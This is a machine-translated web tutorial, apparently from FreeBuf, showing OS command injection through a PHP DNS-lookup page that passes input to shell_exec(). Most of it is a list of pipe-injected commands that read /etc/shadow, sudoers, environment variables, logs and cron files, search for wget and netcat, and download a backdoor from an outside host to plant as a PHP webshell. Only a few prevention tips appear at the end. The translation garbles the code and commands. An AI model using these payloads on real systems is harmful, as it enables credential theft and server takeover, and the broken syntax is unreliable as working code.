Now let's take a look:
This is a website interface for querying DNS services. You can enter an IP address or a host name in the input box to query.
The implementation of his code is not complex, as shown below:
<? Php
If (isset ($ _ POST ["dns-lookup-php-submit-button"]) {
Try {
If ($ targethost_validated ){
Echo shell_exec ("nslookup". $ targethost );
$ LogHandler-> writeToLog ($ conn, "Executed operating system command: nslookup". $ lTargetHostText );
} Else {
Echo '<script> document. getElementById ("id-bad-cred-tr"). style. display = "" </script> ';
} // End if ($ targethost_validated ){
} Catch (Exception $ e ){
Echo $ CustomErrorHandler-> FormatError ($ e, "Input:". $ targethost );
} // End try
} // End if (isset ($ _ POST ))
?>
Www.2cto.com
Now, we try to query an IP address 74.125.31.102.
In the previous Code, have you found the shell_exec () function?
Now you should understand how this query interface is implemented, that is, it is very easy to execute system commands through shell_exec ("nslookup". $ targethost.
Next, we will try to inject malicious code.
In LINUX, "&" can be used to connect commands. ";" is the command separator.
Now, we will use the echo command to make some attempts, and I personally prefer to use "|" instead of "&". The specific reason is described below.
| Echo 'hello': The above command is actually executed in the same way as nslookup | echo 'hello' in the terminal.
Why do I use the pipeline operator "|" instead? It will be explained to you.
Next we try to get more server information. Because we used the command uname-a before, we can identify the system information, such as Linux kernel release 3.0.0-1, the host name of the network contact is projectX, and the operating system is GNU/Linux... Let's check which linux server is used:
| Cat/etc/issue
| Cat/etc/*-release
| Cat/etc/lsb-release
| Cat/etc/redhat-release
Ha, this is a BackBox, which is my favorite linux release. :) Let's see under which directory we are located:
| Pwd; ls-la
To collect more information, we need to check the services running on the server.
| Ps aux
| Ps-ef
| Top
| Cat/etc/service
To further discover vulnerabilities in the system, penetration tests are conducted using methods such as exploit.
You may need the following commands:
| Cat/etc/environment
| Cat/proc/self/environ <em> | cat/etc/shadow </em>
| Cat/etc/sudoers
| Cat/etc/group
| Cat/etc/security/group
| Cat/etc/security/passwd
| Cat/etc/security/user
| Cat/etc/security/environ
| Cat/etc/security/limits
| Cat/usr/lib/security/mkuser. default
| Cat/var/log/messages
| Cat var/log/mysql. log
| Cat/var/log/user. log
| Cat/var/www/logs/error_log
| Cat/etc/syslog. conf
| Cat/etc/chttp. conf
| Cat/etc/lighttpd. conf
| Cat/etc/cups/cupsd. conf
| Cat/etc/inetd. conf
| Cat/etc/apache2/apache2.conf
| Cat/var/log/apache2/error. log
| Cat/etc/my. conf
| Cat/etc/httpd/conf/httpd. conf
| Cat/opt/lampp/etc/httpd. conf
| Ls-aRl/etc/| awk '$1 ~ /^. * R .*/
| Cat/etc/resolv. conf
| Cat/etc/sysconfig/network
| Cat/etc/networks
|/Sbin/ifconfig-
| Cat/etc/network/interfaces
| S-alh/var/spool/cron
| Ls-al/etc/| grep cron
| Ls-al/etc/cron *
| Cat/etc/cron *
| Cat/etc/at. allow
| Cat/etc/at. deny
| Cat/etc/cron. allow
| Cat/etc/cron. deny
| Cat/etc/crontab
| Cat/etc/anacrontab
| Cat/var/spool/cron/crontabs/root
Many attackers are willing to leave backdoors on Linux servers, so they need to try which files can be uploaded.
| Find/-name wget
| Find/-name nc *
| Find/-name netcat *
| Find/-name tftp *
| Find/-name ftp: wget a txt file
| Wget http://freebuf.com/thanks/ <em> unixhck </em>. txt
Succeeded
Well, in this case, we will naturally be a webshell for wget.
| Wget http://freebuf.com/backdoor.txtrename
| Cp backdoor.txt backdoor. php
View our shell
Several TIPS to prevent remote code execution:
1. Disable the shell_exec () function
2. If you really need to use the shell_exec () function, we recommend that you use escapeshellarg () and escapeshellcmd () for filtering.
3. Use the WAF or mod_security modules for interception and filtering
From FreebuF. COM